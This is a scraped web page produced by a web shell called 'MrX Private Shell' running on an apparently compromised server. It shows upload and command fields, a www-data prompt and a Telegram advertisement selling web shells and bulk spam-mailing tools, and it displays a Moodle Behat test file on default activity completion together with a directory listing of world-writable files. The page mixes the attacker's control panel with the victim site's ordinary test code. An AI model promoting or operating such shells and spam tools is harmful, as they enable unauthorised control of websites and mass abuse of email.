__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@core @core_completion
Feature: Allow admins to edit the default activity completion rules at site level.
  In order to set the activity completion defaults for new activities
  As an admin
  I need to be able to edit the completion rules for a group of activities at site level.

  Background:
    Given the following "courses" exist:
      | fullname | shortname | category | enablecompletion |
      | Course 1 | C1        | 0        | 1                |
    And I log in as "admin"

  @javascript
  Scenario: Default activity completion rules with no site or course default completion
    Given the following "activity" exists:
      | activity   | assign               |
      | course     | C1                   |
      | name       | Test assignment one  |
      | completion | 1                    |
    When I add a assign activity to course "Course 1" section "0"
    And I expand all fieldsets
    # Completion tracking 0 = Do not indicate activity completion.
    Then the field "None" matches value "1"
    # Default values don't affect existing activities.
    But I am on the "Test assignment one" "assign activity editing" page
    And I navigate to "Settings" in current page administration
    And I expand all fieldsets
    And the field "Students must manually mark the activity as done" matches value "1"
    And the field "None" matches value "0"

  @javascript
  Scenario: Default activity completion rules with site default completion but with no course default completion
    Given the following "activity" exists:
      | activity   | assign               |
      | course     | C1                   |
      | name       | Test assignment one  |
      | completion | 0                    |
    And the following "core_completion > Course default" exist:
      | course               | module | completion | completionview | completionusegrade | completionsubmit |
      | Acceptance test site | assign | 2          | 0              | 1                  | 1                |
    When I add a assign activity to course "Course 1" section "0"
    And I expand all fieldsets
    Then the field "Add requirements" matches value "1"
    And the field "completionview" matches value "0"
    And the field "completionusegrade" matches value "1"
    And the field "completionsubmit" matches value "1"
    # Default values don't affect existing activities.
    But I am on the "Test assignment one" "assign activity editing" page
    And I navigate to "Settings" in current page administration
    And I expand all fieldsets
    And the field "Add requirements" matches value "0"
    And the field "None" matches value "1"

  @javascript
  Scenario: Default activity completion rules with site default completion and course default completion
    Given the following "activity" exists:
      | activity   | assign               |
      | course     | C1                   |
      | name       | Test assignment one  |
      | completion | 0                    |
    And the following "core_completion > Course defaults" exist:
      | course               | module | completion | completionview | completionusegrade | completionsubmit |
      | Acceptance test site | assign | 2          | 0              | 1                  | 1                |
      | C1                   | assign | 2          | 1              | 0                  | 1                |
    When I add a assign activity to course "Course 1" section "0"
    And I expand all fieldsets
    Then the field "Add requirements" matches value "1"
    And the field "completionview" matches value "1"
    And the field "completionusegrade" matches value "0"
    And the field "completionsubmit" matches value "1"
    # Default values don't affect existing activities.
    But I am on the "Test assignment one" "assign activity editing" page
    And I navigate to "Settings" in current page administration
    And I expand all fieldsets
    And the field "Add requirements" matches value "0"
    And the field "None" matches value "1"

  Scenario: Navigate to site default activity completion
    Given I navigate to "Courses > Default settings > Default activity completion" in site administration
    When I should see "Default activity completion"
    Then I should see "These are the default completion conditions for activities in all courses."
    And the following config values are set as admin:
      | enablecompletion  | 0 |
    And I navigate to "Courses > Default settings" in site administration
    And I should not see "Default activity completion"

Filemanager

Name Type Size Permission Actions
activity_completion_criteria.feature File 7.67 KB 0777
backup_restore_completion.feature File 3.31 KB 0777
behat_completion.php File 20.13 KB 0777
bulk_edit_activity_completion.feature File 6.36 KB 0777
completion_course_page_display.feature File 2.9 KB 0777
completion_no_calendar_capabilities.feature File 1.79 KB 0777
completion_other_courses.feature File 1.48 KB 0777
course_completion_activity_criteria.feature File 8.13 KB 0777
custom_completion_display_conditions.feature File 4.65 KB 0777
default_activity_completion.feature File 13.11 KB 0777
enable_completion_on_pass_grade.feature File 2.66 KB 0777
enable_completion_on_view_and_grade.feature File 4.32 KB 0777
enable_manual_complete_mark.feature File 1.49 KB 0777
passgrade_completion_criteria_gradeitem_visibility.feature File 7.56 KB 0777
restrict_activity_by_date.feature File 2.84 KB 0777
restrict_activity_by_grade.feature File 2.94 KB 0777
restrict_section_availability.feature File 4.42 KB 0777
site_default_activity_completion.feature File 4.44 KB 0777
teacher_manual_completion.feature File 1.97 KB 0777
Filemanager